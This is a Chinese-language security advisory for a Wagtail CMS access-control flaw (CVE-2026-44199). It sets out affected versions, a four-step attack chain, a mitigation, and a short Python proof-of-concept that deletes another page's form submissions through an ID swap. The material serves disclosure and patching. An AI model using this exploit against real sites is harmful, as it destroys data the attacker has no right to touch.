CVE-2026-44199 Wagtail CMS权限绕过漏洞

漏洞信息

漏洞编号

CVE-2026-44199

漏洞类型

访问控制失效

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wagtail

漏洞概述

Wagtail是基于Django的开源CMS。在7.0.7、7.3.2和7.4版本之前，存在访问控制漏洞。拥有表单页面有限权限的用户，可以通过精心构造请求，删除其无权访问的页面上的表单提交数据。该漏洞无法被没有后台权限的普通访客利用，已在指定版本中修复。

技术细节

该漏洞属于不安全的直接对象引用（IDOR）漏洞。Wagtail在处理表单提交删除请求时，仅验证了用户是否拥有发起请求的页面的访问权限，而未充分验证用户对目标提交数据所属页面的具体操作权限。攻击者利用其在有权限的页面上的删除接口，将请求中的表单提交ID替换为无权访问的页面上的提交ID。由于服务器端校验逻辑不完善，导致系统错误地执行了删除操作，破坏了数据的完整性。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者需要注册或获取一个具有Wagtail后台管理权限的账户，且该账户对至少一个表单页面拥有删除提交的权限。

STEP 2

步骤2：识别目标ID

攻击者通过浏览器开发者工具或猜测，确定目标表单提交的ID，该提交属于攻击者原本无权访问的页面。

STEP 3

步骤3：构造恶意请求

攻击者利用其有权限访问的页面接口，构造一个包含目标提交ID的删除请求（HTTP POST）。

STEP 4

步骤4：执行越权删除

服务器接收请求后，未能正确校验提交ID与页面的归属关系，执行删除操作，导致数据丢失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
target_url = "http://example.com"
login_url = f"{target_url}/admin/login/"
delete_endpoint = f"{target_url}/admin/pages/<accessible_page_id>/submissions/delete/"
username = "limited_user"
password = "user_password"

# The ID of the submission to delete (belonging to a restricted page)
target_submission_id = 999 

session = requests.Session()

# 1. Authenticate to get session
login_data = {
    "username": username,
    "password": password,
    "csrfmiddlewaretoken": "<get_from_login_page>",
    "next": "/admin/"
}
session.post(login_url, data=login_data)

# 2. Craft the exploit payload
# Attacker sends a request to delete submission ID 999 via a page they have access to
payload = {
    "action": "delete",
    "selected_submission": target_submission_id,
    "csrfmiddlewaretoken": "<get_valid_token>"
}

# 3. Send the exploit request
response = session.post(delete_endpoint, data=payload)

if response.status_code == 200:
    print(f"[+] Successfully deleted submission ID: {target_submission_id}")
else:
    print(f"[-] Exploit failed. Status: {response.status_code}")

影响范围

Wagtail < 7.0.7

Wagtail >= 7.1.0, < 7.3.2

Wagtail < 7.4

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用非必要用户的表单提交删除功能，或仅允许管理员级别用户删除表单数据，直到完成补丁更新。